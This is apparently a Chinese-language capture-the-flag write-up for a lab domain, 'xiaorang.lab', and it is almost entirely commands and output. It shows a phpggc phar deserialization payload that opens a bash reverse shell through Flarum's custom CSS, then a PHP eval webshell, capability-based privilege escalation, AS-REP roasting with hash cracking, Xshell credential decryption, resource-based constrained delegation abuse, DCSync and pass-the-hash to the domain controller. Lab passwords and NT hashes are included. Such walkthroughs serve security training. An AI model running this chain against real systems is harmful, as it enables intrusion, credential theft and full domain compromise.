flag01
fscan扫一下
flarum 论坛
用户名为 administrator 或者 administrator@xiaorang.lab
密码用 rockyou.txt 跑(很久),结果是administrator/1chris
接下来按着p牛的博客开始RCE,先下一个phpggc,一种类似于yso但是针对php的反序列化利用工具,这里为了可控文件头,我们使用phpggc来生成tar格式包,里面内容就是反弹shell的命令
php phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'"
./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'" #这条命令运行了很久都没结果
如果遇到Cannot create phar: phar.readonly is set to 1报错,参考文章,修改参数
将base64代码复制过来,在后台修改css那里替换下面代码的……
@import (inline) 'data:text/css;base64,……';
接着访问一下主页39.xx.xx.xx/assets/forum.css确保css样式已经成功修改
接下来再次修改自定义CSS,使用phar协议包含我们修改的css文件
.test {
content: data-uri('phar://./assets/forum.css');
}
拿到shell
写个马好上蚁剑(/var/www/html/public/assets目录下才有权限,后面的文件上传也是一样)
echo "<?php @eval(\$_POST[1]);?>" > 1.php
连接蚁剑http://39.xx.xx.xx/assets/1.php
提权
getcap -r / 2>/dev/null
capabilities之openssl,得到flag01
openssl enc -in "/root/flag/flag01.txt"
flag03
上传fscan和frp,开代理
信息收集(蚁剑上fscan不回显)
172.22.60.42:445 open
172.22.60.15:445 open
172.22.60.42:139 open
172.22.60.8:139 open
172.22.60.15:139 open
172.22.60.42:135 open
172.22.60.15:135 open
172.22.60.8:135 open
172.22.60.52:80 open
172.22.60.52:22 open
172.22.60.52:8084 open
172.22.60.52:8083 open
172.22.60.8:88 open
172.22.60.8:445 open
172.22.60.52:8080 open
[*] NetInfo:
[*]172.22.60.15
[->]PC1
[->]172.22.60.15
[->]169.254.204.42
[*] NetBios: 172.22.60.15 XIAORANG\PC1
[*] NetBios: 172.22.60.8 [+]DC XIAORANG\DC
[*] NetInfo:
[*]172.22.60.42
[->]Fileserver
[->]172.22.60.42
[->]169.254.134.157
[*] WebTitle: https://172.22.60.52:8080 code:200 len:260 title:None
[*] NetInfo:
[*]172.22.60.8
[->]DC
[->]172.22.60.8
[->]169.254.114.245
[*] WebTitle: https://172.22.60.52:8084 code:200 len:260 title:None
[*] NetBios: 172.22.60.42 XIAORANG\FILESERVER
[*] WebTitle: https://172.22.60.52:8083 code:200 len:260 title:None
[*] WebTitle: http://172.22.60.52 code:200 len:5867 title:霄壤社区
得到下面的信息
172.22.60.52 本机
172.22.60.15 PC1域内机器
172.22.60.42 Fileserver域内机器
172.22.60.8 DC域
在config.php中找到数据库密码
root/Mysql@root123
蚁剑连接
导出 flarum 用户的用户名,然后AS-REP Roasting
proxychains impacket-GetNPUsers -dc-ip 172.22.60.8 xiaorang.lab/ -usersfile flarum_users.txt
得到两个hash
'$krb5asrep$23$zhangxin@XIAORANG.LAB:b505f6f8f88b922532bb16ca201e40db$096140933263872ea92b3fb76cd2ee4e85e53bc3d1a84f652a484cc15cc55312399b6ea32da1d6d81b9f59a52890ec5b63fa2c133cafdc0aef37448f969784805528c0f2cb9e7c86d0b644eeddef544a1c29bedc788c6072e0dd4de1625a3f9ee31b4d0a8a18946bc0e59c8c7ea3c6884b28812d4d1a74382a67b19ff26923d3fe4a856c85b08434682c3c303b30577b503d174a82d3223f2b8971d0dbe75f5b7ace377fd1912a3fa5665da3d627dd650ed2abffbc853569ba48a2c3511ee7eed5cacbb3e5af0a258a61689529929542c062754d95b918d0d5ebbe8f4e6795879e69eea2335f6796b2297eb1'
'$krb5asrep$23$wangyun@XIAORANG.LAB:a2452cf31a79b10862f618f1b640afaf$045cd13b5cda191cc51b4b598ae617a2fb2a95d4646a95aeea1b1e20922d7a47f7ad24915714a9c5a243022fabefa0dd2e421d9502cddc17178dae58f54ec50f4d81b0bc082a7334673c623156dbf45c4fe4e2ab3d588c0d24fada9c62ca051e8dc9737069ea3505bf6fd7e21a7bcc82cd5070eab42efcc809a2bb2767c3e97c675553ca5acca6cf9b1872462756055a2512d69db7ef2a9e38c0873af757fd963bc941224ca71627773a28f3740f71c4bb4ebfae37e9e01da6ba7dfef37119df61e53dcb7edf82b3e89b344568b17d87effb105f30c5a87ee592555e5966dee4709742cedabfd86092f05056'
爆破
hashcat -a 0 -m 18200 --force hash.txt rockyou.txt
只能爆出一个,还有个zhangxin爆不出来
wangyun/Adm12geC
远程连接172.22.60.15
wangyun@xiaorang.lab/Adm12geC
跑一下bloodhound
proxychains python3 bloodhound.py -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp
分析一下
FILESERVER 机器账户具有 DCSync 权限
zhangxin 用户属于 Account Operators 组, 因此对域内非域控的所有机器都具有 GenericAll ACL 权限
那么思路就是通过 zhangxin 对 FILESERVER 配置 RBCD, 然后 DCSync攻击 拿下域控
来看wangyun用户,里面有个xshell
该会话还存储了zhangxin密码,用SharpXDecrypt提取密码(秒出!)
得到密码
UserName: zhangxin
Password: admin4qwY38cc
接下来打RBCD
方法一:
参考域渗透之委派攻击全集里的Acount Operators组用户拿下主机。
Powermad.ps1-->https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
看大佬的博客配置
> Set-ExecutionPolicy Bypass -Scope Process
[Y] 是(Y) [A] 全是(A) [N] 否(N) [L] 全否(L) [S] 暂停(S) [?] 帮助 (默认值为“N”): Y
> import-module .\Powermad.ps1
> New-MachineAccount -MachineAccount test -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)
> import-module .\powerview.ps1
> Get-NetComputer test -Properties objectsid
> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1116)"
> $SDBytes = New-Object byte[] ($SD.BinaryLength)
> $SD.GetBinaryForm($SDBytes, 0)
> Get-DomainComputer Fileserver| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
报错了?(后来想想应该是连了校园网的缘故,连热点应该就可以了)
修改kali的/ect/hosts,添加ip
172.22.60.15 PC1.xiaorang.lab
172.22.60.42 FILESERVER.xiaorang.lab
172.22.60.8 XIAORANG\DC
申请票据,无密码连接(前面报错了,所以这里利用失败了)
proxychains python3 getST.py -dc-ip 172.22.60.8 xiaorang.lab/test\$:123456 -spn cifs/Fileserver.xiaorang.lab -impersonate administrator
export KRB5CCNAME=administrator.ccache
proxychains python3 psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk
方法二:
proxychains python3 addcomputer.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'TEST2$' -computer-pass 'P@ssw0rd'
proxychains python3 rbcd.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'Fileserver$' -delegate-from 'TEST2$'
proxychains python3 getST.py xiaorang.lab/'TEST2$':'P@ssw0rd' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8
export KRB5CCNAME=Administrator.ccache
修改/etc/hosts
无密码连上去
proxychains python3 psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk
flag02 & flag04
抓一下FILESERVER的哈希
proxychains python3 secretsdump.py -k -no-pass Fileserver.xiaorang.lab -dc-ip 172.22.60.8
报错了?
用impacket的secretsdump就可以了,很神奇
proxychains impacket-secretsdump -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8
得到hash
XIAORANG\Fileserver$:951d8a9265dfb652f42e5c8c497d70dc
利用 Fileserver 机器账户进行 DCSync攻击,得到域控hash
proxychains python3 secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator
Administratorc3cfdc08527ec4ab6aa3e630e79d349b
横传到域控,拿flag
proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b Administrator@172.22.60.8 -codec gbk
横传到fileserver,拿flag
proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/Administrator@172.22.60.15 -codec gbk